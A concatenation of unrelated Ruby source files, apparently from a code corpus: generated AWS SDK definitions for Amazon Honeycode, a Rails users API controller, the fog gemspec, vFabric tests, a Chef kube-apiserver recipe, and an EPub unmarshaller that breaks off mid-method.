QueryTableRowsResult.add_member(:rows, Shapes::ShapeRef.new(shape: TableRows, required: true, location_name: "rows"))
QueryTableRowsResult.add_member(:next_token, Shapes::ShapeRef.new(shape: PaginationToken, location_name: "nextToken"))
QueryTableRowsResult.add_member(:workbook_cursor, Shapes::ShapeRef.new(shape: WorkbookCursor, required: true, location_name: "workbookCursor"))
QueryTableRowsResult.struct_class = Types::QueryTableRowsResult
RequestTimeoutException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
RequestTimeoutException.struct_class = Types::RequestTimeoutException
ResourceIds.member = Shapes::ShapeRef.new(shape: ResourceId)
ResourceNotFoundException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
ResourceNotFoundException.struct_class = Types::ResourceNotFoundException
ResultHeader.member = Shapes::ShapeRef.new(shape: ColumnMetadata)
ResultRow.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, location_name: "rowId"))
ResultRow.add_member(:data_items, Shapes::ShapeRef.new(shape: DataItems, required: true, location_name: "dataItems"))
ResultRow.struct_class = Types::ResultRow
ResultRows.member = Shapes::ShapeRef.new(shape: ResultRow)
ResultSet.add_member(:headers, Shapes::ShapeRef.new(shape: ResultHeader, required: true, location_name: "headers"))
ResultSet.add_member(:rows, Shapes::ShapeRef.new(shape: ResultRows, required: true, location_name: "rows"))
ResultSet.struct_class = Types::ResultSet
ResultSetMap.key = Shapes::ShapeRef.new(shape: Name)
ResultSetMap.value = Shapes::ShapeRef.new(shape: ResultSet)
RowDataInput.key = Shapes::ShapeRef.new(shape: ResourceId)
RowDataInput.value = Shapes::ShapeRef.new(shape: CellInput)
RowIdList.member = Shapes::ShapeRef.new(shape: RowId)
ServiceQuotaExceededException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, required: true, location_name: "message"))
ServiceQuotaExceededException.struct_class = Types::ServiceQuotaExceededException
ServiceUnavailableException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
ServiceUnavailableException.struct_class = Types::ServiceUnavailableException
SourceDataColumnProperties.add_member(:column_index, Shapes::ShapeRef.new(shape: SourceDataColumnIndex, location_name: "columnIndex"))
SourceDataColumnProperties.struct_class = Types::SourceDataColumnProperties
StartTableDataImportJobRequest.add_member(:workbook_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "workbookId"))
StartTableDataImportJobRequest.add_member(:data_source, Shapes::ShapeRef.new(shape: ImportDataSource, required: true, location_name: "dataSource"))
StartTableDataImportJobRequest.add_member(:data_format, Shapes::ShapeRef.new(shape: ImportSourceDataFormat, required: true, location_name: "dataFormat"))
StartTableDataImportJobRequest.add_member(:destination_table_id, Shapes::ShapeRef.new(shape: ResourceId, required: true, location: "uri", location_name: "tableId"))
StartTableDataImportJobRequest.add_member(:import_options, Shapes::ShapeRef.new(shape: ImportOptions, required: true, location_name: "importOptions"))
StartTableDataImportJobRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, required: true, location_name: "clientRequestToken"))
StartTableDataImportJobRequest.struct_class = Types::StartTableDataImportJobRequest
StartTableDataImportJobResult.add_member(:job_id, Shapes::ShapeRef.new(shape: JobId, required: true, location_name: "jobId"))
StartTableDataImportJobResult.add_member(:job_status, Shapes::ShapeRef.new(shape: TableDataImportJobStatus, required: true, location_name: "jobStatus"))
StartTableDataImportJobResult.struct_class = Types::StartTableDataImportJobResult
Table.add_member(:table_id, Shapes::ShapeRef.new(shape: ResourceId, location_name: "tableId"))
Table.add_member(:table_name, Shapes::ShapeRef.new(shape: TableName, location_name: "tableName"))
# Shape registrations for the Honeycode API model: each call wires a struct
# member (with its JSON wire name via location_name), the Ruby struct class,
# or the element/key/value shape of a list/map type.
# NOTE(review): this appears to be aws-sdk generated code (see "@api private"
# and the service metadata below) — confirm before hand-editing.
Table.struct_class = Types::Table
TableColumn.add_member(:table_column_id, Shapes::ShapeRef.new(shape: ResourceId, location_name: "tableColumnId"))
TableColumn.add_member(:table_column_name, Shapes::ShapeRef.new(shape: TableColumnName, location_name: "tableColumnName"))
TableColumn.add_member(:format, Shapes::ShapeRef.new(shape: Format, location_name: "format"))
TableColumn.struct_class = Types::TableColumn
TableColumns.member = Shapes::ShapeRef.new(shape: TableColumn)
TableDataImportJobMetadata.add_member(:submitter, Shapes::ShapeRef.new(shape: ImportJobSubmitter, required: true, location_name: "submitter"))
TableDataImportJobMetadata.add_member(:submit_time, Shapes::ShapeRef.new(shape: TimestampInMillis, required: true, location_name: "submitTime"))
TableDataImportJobMetadata.add_member(:import_options, Shapes::ShapeRef.new(shape: ImportOptions, required: true, location_name: "importOptions"))
TableDataImportJobMetadata.add_member(:data_source, Shapes::ShapeRef.new(shape: ImportDataSource, required: true, location_name: "dataSource"))
TableDataImportJobMetadata.struct_class = Types::TableDataImportJobMetadata
TableRow.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, required: true, location_name: "rowId"))
TableRow.add_member(:cells, Shapes::ShapeRef.new(shape: Cells, required: true, location_name: "cells"))
TableRow.struct_class = Types::TableRow
TableRows.member = Shapes::ShapeRef.new(shape: TableRow)
Tables.member = Shapes::ShapeRef.new(shape: Table)
ThrottlingException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, location_name: "message"))
ThrottlingException.struct_class = Types::ThrottlingException
UpdateRowData.add_member(:row_id, Shapes::ShapeRef.new(shape: RowId, required: true, location_name: "rowId"))
UpdateRowData.add_member(:cells_to_update, Shapes::ShapeRef.new(shape: RowDataInput, required: true, location_name: "cellsToUpdate"))
UpdateRowData.struct_class = Types::UpdateRowData
UpdateRowDataList.member = Shapes::ShapeRef.new(shape: UpdateRowData)
UpsertRowData.add_member(:batch_item_id, Shapes::ShapeRef.new(shape: BatchItemId, required: true, location_name: "batchItemId"))
UpsertRowData.add_member(:filter, Shapes::ShapeRef.new(shape: Filter, required: true, location_name: "filter"))
UpsertRowData.add_member(:cells_to_update, Shapes::ShapeRef.new(shape: RowDataInput, required: true, location_name: "cellsToUpdate"))
UpsertRowData.struct_class = Types::UpsertRowData
UpsertRowDataList.member = Shapes::ShapeRef.new(shape: UpsertRowData)
UpsertRowsResult.add_member(:row_ids, Shapes::ShapeRef.new(shape: RowIdList, required: true, location_name: "rowIds"))
UpsertRowsResult.add_member(:upsert_action, Shapes::ShapeRef.new(shape: UpsertAction, required: true, location_name: "upsertAction"))
UpsertRowsResult.struct_class = Types::UpsertRowsResult
UpsertRowsResultMap.key = Shapes::ShapeRef.new(shape: BatchItemId)
UpsertRowsResultMap.value = Shapes::ShapeRef.new(shape: UpsertRowsResult)
ValidationException.add_member(:message, Shapes::ShapeRef.new(shape: ErrorMessage, required: true, location_name: "message"))
ValidationException.struct_class = Types::ValidationException
VariableValue.add_member(:raw_value, Shapes::ShapeRef.new(shape: RawValue, required: true, location_name: "rawValue"))
VariableValue.struct_class = Types::VariableValue
VariableValueMap.key = Shapes::ShapeRef.new(shape: VariableName)
VariableValueMap.value = Shapes::ShapeRef.new(shape: VariableValue)
# @api private
# Seahorse API model for Amazon Honeycode (rest-json protocol, SigV4 signing;
# see the metadata hash below). Each add_operation entry wires an operation's
# HTTP method/URI, request/response shapes, declared error shapes, and — for
# list/query operations — pagination token configuration.
API = Seahorse::Model::Api.new.tap do |api|
  api.version = "2020-03-01"

  # Service-level wire metadata taken from the honeycode-2020-03-01 model.
  api.metadata = {
    "apiVersion" => "2020-03-01",
    "endpointPrefix" => "honeycode",
    "jsonVersion" => "1.1",
    "protocol" => "rest-json",
    "serviceAbbreviation" => "Honeycode",
    "serviceFullName" => "Amazon Honeycode",
    "serviceId" => "Honeycode",
    "signatureVersion" => "v4",
    "signingName" => "honeycode",
    "uid" => "honeycode-2020-03-01",
  }

  api.add_operation(:batch_create_table_rows, Seahorse::Model::Operation.new.tap do |o|
    o.name = "BatchCreateTableRows"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchcreate"
    o.input = Shapes::ShapeRef.new(shape: BatchCreateTableRowsRequest)
    o.output = Shapes::ShapeRef.new(shape: BatchCreateTableRowsResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceQuotaExceededException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
  end)

  api.add_operation(:batch_delete_table_rows, Seahorse::Model::Operation.new.tap do |o|
    o.name = "BatchDeleteTableRows"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchdelete"
    o.input = Shapes::ShapeRef.new(shape: BatchDeleteTableRowsRequest)
    o.output = Shapes::ShapeRef.new(shape: BatchDeleteTableRowsResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
  end)

  api.add_operation(:batch_update_table_rows, Seahorse::Model::Operation.new.tap do |o|
    o.name = "BatchUpdateTableRows"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchupdate"
    o.input = Shapes::ShapeRef.new(shape: BatchUpdateTableRowsRequest)
    o.output = Shapes::ShapeRef.new(shape: BatchUpdateTableRowsResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
  end)

  api.add_operation(:batch_upsert_table_rows, Seahorse::Model::Operation.new.tap do |o|
    o.name = "BatchUpsertTableRows"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/batchupsert"
    o.input = Shapes::ShapeRef.new(shape: BatchUpsertTableRowsRequest)
    o.output = Shapes::ShapeRef.new(shape: BatchUpsertTableRowsResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceQuotaExceededException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
  end)

  api.add_operation(:describe_table_data_import_job, Seahorse::Model::Operation.new.tap do |o|
    o.name = "DescribeTableDataImportJob"
    o.http_method = "GET"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/import/{jobId}"
    o.input = Shapes::ShapeRef.new(shape: DescribeTableDataImportJobRequest)
    o.output = Shapes::ShapeRef.new(shape: DescribeTableDataImportJobResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
  end)

  api.add_operation(:get_screen_data, Seahorse::Model::Operation.new.tap do |o|
    o.name = "GetScreenData"
    o.http_method = "POST"
    o.http_request_uri = "/screendata"
    o.input = Shapes::ShapeRef.new(shape: GetScreenDataRequest)
    o.output = Shapes::ShapeRef.new(shape: GetScreenDataResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
  end)

  api.add_operation(:invoke_screen_automation, Seahorse::Model::Operation.new.tap do |o|
    o.name = "InvokeScreenAutomation"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/apps/{appId}/screens/{screenId}/automations/{automationId}"
    o.input = Shapes::ShapeRef.new(shape: InvokeScreenAutomationRequest)
    o.output = Shapes::ShapeRef.new(shape: InvokeScreenAutomationResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: AutomationExecutionException)
    o.errors << Shapes::ShapeRef.new(shape: AutomationExecutionTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
  end)

  api.add_operation(:list_table_columns, Seahorse::Model::Operation.new.tap do |o|
    o.name = "ListTableColumns"
    o.http_method = "GET"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/columns"
    o.input = Shapes::ShapeRef.new(shape: ListTableColumnsRequest)
    o.output = Shapes::ShapeRef.new(shape: ListTableColumnsResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
    # Token-only pagination (no page-size limit key for this operation).
    o[:pager] = Aws::Pager.new(
      tokens: {
        "next_token" => "next_token"
      }
    )
  end)

  api.add_operation(:list_table_rows, Seahorse::Model::Operation.new.tap do |o|
    o.name = "ListTableRows"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/list"
    o.input = Shapes::ShapeRef.new(shape: ListTableRowsRequest)
    o.output = Shapes::ShapeRef.new(shape: ListTableRowsResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o[:pager] = Aws::Pager.new(
      limit_key: "max_results",
      tokens: {
        "next_token" => "next_token"
      }
    )
  end)

  api.add_operation(:list_tables, Seahorse::Model::Operation.new.tap do |o|
    o.name = "ListTables"
    o.http_method = "GET"
    o.http_request_uri = "/workbooks/{workbookId}/tables"
    o.input = Shapes::ShapeRef.new(shape: ListTablesRequest)
    o.output = Shapes::ShapeRef.new(shape: ListTablesResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
    o[:pager] = Aws::Pager.new(
      limit_key: "max_results",
      tokens: {
        "next_token" => "next_token"
      }
    )
  end)

  api.add_operation(:query_table_rows, Seahorse::Model::Operation.new.tap do |o|
    o.name = "QueryTableRows"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/rows/query"
    o.input = Shapes::ShapeRef.new(shape: QueryTableRowsRequest)
    o.output = Shapes::ShapeRef.new(shape: QueryTableRowsResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: RequestTimeoutException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
    o[:pager] = Aws::Pager.new(
      limit_key: "max_results",
      tokens: {
        "next_token" => "next_token"
      }
    )
  end)

  api.add_operation(:start_table_data_import_job, Seahorse::Model::Operation.new.tap do |o|
    o.name = "StartTableDataImportJob"
    o.http_method = "POST"
    o.http_request_uri = "/workbooks/{workbookId}/tables/{tableId}/import"
    o.input = Shapes::ShapeRef.new(shape: StartTableDataImportJobRequest)
    o.output = Shapes::ShapeRef.new(shape: StartTableDataImportJobResult)
    o.errors << Shapes::ShapeRef.new(shape: AccessDeniedException)
    o.errors << Shapes::ShapeRef.new(shape: InternalServerException)
    o.errors << Shapes::ShapeRef.new(shape: ResourceNotFoundException)
    o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
    o.errors << Shapes::ShapeRef.new(shape: ThrottlingException)
    o.errors << Shapes::ShapeRef.new(shape: ValidationException)
  end)
end
end
end
| 70.489426 | 172 | 0.763094 |
e98803e854a0b0bcd9a7635f667caa67a0634f21 | 694 | class Api::V1::UsersController < ApplicationController
# GET /api/v1/users
# Renders the full user collection as JSON.
def index
  @users = User.all
  render json: @users
end
# GET /api/v1/users/:id
# Renders one user as JSON. An unknown id raises
# ActiveRecord::RecordNotFound (handled by Rails' default rescue).
def show
  @user = User.find(params[:id])
  render json: @user
end
# POST /api/v1/users
# Creates a user from the permitted params. Renders the new record as JSON
# with 201 on success, or the validation errors with 422 on failure. The
# original rendered nothing at all, which hid validation failures from API
# clients and returned no representation of the created record.
def create
  @user = User.new(user_params)
  if @user.save
    render json: @user, status: :created
  else
    render json: {errors: @user.errors.full_messages}, status: 422
  end
end
# DELETE /api/v1/users/:id
# Destroys the user and responds 204 No Content explicitly, rather than
# relying on Rails' implicit empty response for a render-less action.
# An unknown id raises ActiveRecord::RecordNotFound, as in #show.
def destroy
  User.find(params[:id]).destroy
  head :no_content
end
# PATCH/PUT /api/v1/users/:id
# Updates the user with the permitted params and renders it as JSON, or the
# validation errors with 422. ActiveRecord's #update already assigns the
# attributes AND saves, so the original's follow-up `@user.save` ran the
# validation/save pass a second time for no benefit; branching directly on
# #update's return value is equivalent and avoids the redundant save.
def update
  @user = User.find(params[:id])
  if @user.update(user_params)
    render json: @user
  else
    render json: {errors: @user.errors.full_messages}, status: 422
  end
end
private

# Strong-parameters whitelist for create/update.
# NOTE(review): this permits top-level keys rather than the conventional
# nested `params.require(:user).permit(...)` — confirm clients send a flat
# payload before changing it.
def user_params
  params.permit(:name, :cash, :cryptokey)
end
end
| 18.263158 | 74 | 0.560519 |
7998b22619bab9a6b6f6508d95a6025a1326b153 | 3,280 | Gem::Specification.new do |s|
s.specification_version = 2 if s.respond_to? :specification_version=
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
## Leave these as is they will be modified for you by the rake gemspec task.
## If your rubyforge_project name is different, then edit it and comment out
## the sub! line in the Rakefile
s.name = 'fog'
s.version = '1.18.0'
s.date = '2013-10-31'
# NOTE(review): rubyforge_project is deprecated in modern RubyGems; harmless
# here but removable if the gemspec is ever modernized.
s.rubyforge_project = 'fog'
## Make sure your summary is short. The description may be as long
## as you like.
s.summary = "brings clouds to you"
s.description = "The Ruby cloud services library. Supports all major cloud providers including AWS, Rackspace, Linode, Blue Box, StormOnDemand, and many others. Full support for most AWS services including EC2, S3, CloudWatch, SimpleDB, ELB, and RDS."
## List the primary authors. If there are a bunch of authors, it's probably
## better to set the email to an email list or something. If you don't have
## a custom homepage, consider using your GitHub URL or the like.
s.authors = ["geemus (Wesley Beary)"]
s.email = '[email protected]'
s.homepage = 'http://github.com/fog/fog'
s.license = 'MIT'
## This section is only necessary if you have C extensions.
# s.require_paths << 'ext'
# s.extensions = %w[ext/extconf.rb]
## This gets added to the $LOAD_PATH so that 'lib/NAME.rb' can be required as
## require 'NAME.rb' or'/lib/NAME/file.rb' can be as require 'NAME/file.rb'
s.require_paths = %w[lib]
## If your gem includes any executables, list them here.
s.executables = ["fog"]
## Specify any RDoc options here. You'll want to add your README and
## LICENSE files to the extra_rdoc_files list.
s.rdoc_options = ["--charset=UTF-8"]
s.extra_rdoc_files = %w[README.md]
## List your runtime dependencies here. Runtime dependencies are those
## that are needed for an end user to actually USE your code.
s.add_dependency('builder')
s.add_dependency('excon', '~>0.28.0')
s.add_dependency('formatador', '~>0.2.0')
s.add_dependency('multi_json', '~>1.0')
s.add_dependency('mime-types')
s.add_dependency('net-scp', '~>1.1')
s.add_dependency('net-ssh', '>=2.1.3')
s.add_dependency('nokogiri', '~>1.5')
s.add_dependency('ruby-hmac')
## List your development dependencies here. Development dependencies are
## those that are only needed during development
# jekyll is skipped on JRuby (not supported there).
s.add_development_dependency('jekyll') unless RUBY_PLATFORM == 'java'
s.add_development_dependency('rake')
s.add_development_dependency('rbvmomi')
s.add_development_dependency('yard')
s.add_development_dependency('thor')
s.add_development_dependency('rspec', '~>1.3.1')
s.add_development_dependency('rbovirt', '>=0.0.11')
s.add_development_dependency('shindo', '~>0.3.4')
s.add_development_dependency('fission')
s.add_development_dependency('pry')
s.add_development_dependency('google-api-client', '~>0.6.2')
s.add_development_dependency('unf')
# libvirt bindings are opt-in via environment variable and unsupported on JRuby.
if ENV["FOG_USE_LIBVIRT"] && RUBY_PLATFORM != 'java'
s.add_development_dependency('ruby-libvirt','~>0.4.0')
end
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {spec,tests}/*`.split("\n")
end
| 43.733333 | 253 | 0.700305 |
4a32c1816cb0ada40cdd485d0907a4f24cb7975d | 1,976 | # vFabric Administration Server Ruby API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Functional tests for the web-server node-instance resources exposed by the
# vFabric Administration Server API.
module WebServer
  class TestNodeInstances < VasTestCase
    # Listing the instances of a node yields the stubbed collection and its
    # security resource location.
    def test_list
      collection = NodeInstances.new(
        'https://localhost:8443/web-server/v1/nodes/1/instances/',
        StubClient.new)

      assert_count(2, collection)
      assert_equal('https://localhost:8443/vfabric/v1/security/3/', collection.security.location)
    end

    # A single instance exposes its name and related resource locations, and
    # start/stop POST the expected state transitions.
    def test_instance
      stub_client = StubClient.new
      node_instance = NodeInstance.new(
        'https://localhost:8443/web-server/v1/nodes/1/instances/2/', stub_client)

      assert_equal('example', node_instance.name)
      assert_equal('https://localhost:8443/web-server/v1/groups/1/instances/2/', node_instance.group_instance.location)
      assert_equal('https://localhost:8443/web-server/v1/nodes/0/instances/3/logs/', node_instance.logs.location)
      assert_equal('https://localhost:8443/web-server/v1/nodes/0/', node_instance.node.location)
      assert_equal('https://localhost:8443/vfabric/v1/security/4/', node_instance.security.location)

      stub_client.expect(:post, nil, ['https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', { :status => 'STARTED'}])
      stub_client.expect(:post, nil, ['https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', { :status => 'STOPPED'}])

      node_instance.start
      node_instance.stop

      stub_client.verify
    end
  end
end
| 38.745098 | 125 | 0.710526 |
bbc2c82805b07864344e16c2c875a7d2bd260e55 | 1,281 | #
# Cookbook: kubernetes-cluster
# License: Apache 2.0
#
# Copyright 2015-2016, Bloomberg Finance L.P.
#
# Enable the kube-apiserver service; the apiserver template below notifies it
# to restart when the configuration changes.
service 'kube-apiserver' do
  action :enable
end

# Record this node's FQDN as the Kubernetes master address for template use.
node.default['kubernetes']['master']['fqdn'] = node['fqdn']

# etcd client configuration for the API server; rendered only when the
# cluster runs in secure (TLS) mode.
template '/etc/kubernetes/etcd.client.conf' do
  mode '0644'
  source 'kube-apiserver-etcd.erb'
  variables(
    etcd_cert_dir: node['kubernetes']['secure']['directory'],
    etcd_members: etcdservers,
    etcd_client_port: node['kubernetes']['etcd']['clientport'],
    etcd_peer_port: 2379
  )
  only_if { node['kubernetes']['secure']['enabled'] == 'true' }
end

# Main kube-apiserver configuration; a change triggers an immediate restart
# of the service resource declared above.
template '/etc/kubernetes/apiserver' do
  mode '0640'
  source 'kube-apiserver.erb'
  variables(
    etcd_client_port: node['kubernetes']['etcd']['clientport'],
    kubernetes_api_port: node['kubernetes']['insecure']['apiport'],
    kubernetes_secure_api_port: node['kubernetes']['secure']['apiport'],
    kubernetes_master: node['kubernetes']['master']['fqdn'],
    etcd_members: node['kubernetes_cluster']['etcd']['members'],
    etcd_peer_port: 2379,
    kubernetes_network: node['kubernetes']['master']['service-network'],
    kubelet_port: node['kubelet']['port'],
    etcd_cert_dir: node['kubernetes']['secure']['directory']
  )
  notifies :restart, 'service[kube-apiserver]', :immediately
end
| 30.5 | 72 | 0.693989 |
1a5d0fd6489b50d839626a9a009ac89d0f856aa3 | 3,871 | # frozen_string_literal: true
module EPub
  module Unmarshaller
    # Wraps an EPUB OPF package ("content") document and resolves manifest
    # hrefs, spine positions, the nav document and the chapter list for one
    # rendition. Instances are built via .from_rootfile_full_path; direct
    # construction is disabled.
    class Content
      private_class_method :new

      # Class Methods

      # Returns a Content for the given Rootfile and OPF full path, or the
      # null object when either argument is missing or of the wrong type.
      def self.from_rootfile_full_path(rootfile, full_path)
        return null_object unless rootfile&.instance_of?(Rootfile) && full_path&.instance_of?(String) && full_path.present?
        new(rootfile, full_path)
      end

      # Null-object factory; uses send to bypass the private constructor.
      def self.null_object
        ContentNullObject.send(:new)
      end

      # Instance Methods

      # Maps an href (an optional #fragment is stripped) to its manifest
      # idref and 1-based spine index. Falls back to the basename and the
      # "../"-prefixed form of the href; returns ['', 0] when unresolvable.
      def idref_with_index_from_href(href)
        href = href.split('#').first
        idref = href_idref[href]
        idref ||= base_href_idref[href]
        idref ||= up_one_href_idref[href]
        index = idref_index[idref]
        return [idref, index] if idref.present? && index.present? && index.positive?
        ['', 0]
      end

      # Case-insensitive title lookup in the chapter list; returns the null
      # chapter when no title matches.
      def chapter_from_title(title)
        chapter_list.chapters.each do |chapter|
          return chapter if chapter.title.casecmp?(title)
        end
        Chapter.null_object
      end

      # Memoized nav document, located via the manifest item carrying
      # properties="nav"; any lookup/parse failure degrades to the null nav.
      def nav
        return @nav unless @nav.nil?
        begin
          nav_href = @content_doc.xpath(".//manifest/item[@properties='nav']").first.attributes["href"].value || ''
          @nav = Nav.from_content_nav_full_path(self, File.join(full_dir, nav_href))
        rescue StandardError => _e
          @nav = Nav.null_object
        end
        @nav
      end

      # Memoized chapter list, located via the manifest item with
      # id="chapterlist"; any failure degrades to the null chapter list.
      def chapter_list
        return @chapter_list unless @chapter_list.nil?
        begin
          chapter_list_href = @content_doc.xpath(".//manifest/item[@id='chapterlist']").first.attributes["href"].value || ''
          @chapter_list = ChapterList.from_content_chapter_list_full_path(self, File.join(full_dir, chapter_list_href))
        rescue StandardError => _e
          @chapter_list = ChapterList.null_object
        end
        @chapter_list
      end

      private

      # Parses the OPF document with namespaces removed so the xpath queries
      # above stay simple; an unreadable/unparsable file degrades to an empty
      # document rather than raising.
      def initialize(rootfile, full_path)
        @rootfile = rootfile
        @full_path = full_path
        begin
          @content_doc = Nokogiri::XML::Document.parse(File.open(@full_path)).remove_namespaces!
        rescue StandardError => _e
          @content_doc = Nokogiri::XML::Document.parse(nil)
        end
      end

      # Directory containing the OPF file; manifest hrefs resolve against it.
      def full_dir
        @full_dir ||= File.dirname(@full_path)
      end

      # Memoized href => idref map over every manifest item.
      def href_idref
        return @href_idref unless @href_idref.nil?
        @href_idref = {}
        @content_doc.xpath(".//manifest/item").each do |item|
          href = item.attribute('href').value
          idref = item.attribute('id').value
          @href_idref[href] = idref if href.present? && idref.present?
        end
        @href_idref
      end

      # Memoized variant of href_idref keyed by file basename.
      def base_href_idref
        return @base_href_idref unless @base_href_idref.nil?
        @base_href_idref = {}
        href_idref.each do |href, idref|
          base_href = File.basename(href)
          @base_href_idref[base_href] = idref
        end
        @base_href_idref
      end

      # Memoized variant of href_idref keyed by "../"-prefixed href.
      def up_one_href_idref
        return @up_one_href_idref unless @up_one_href_idref.nil?
        @up_one_href_idref = {}
        href_idref.each do |href, idref|
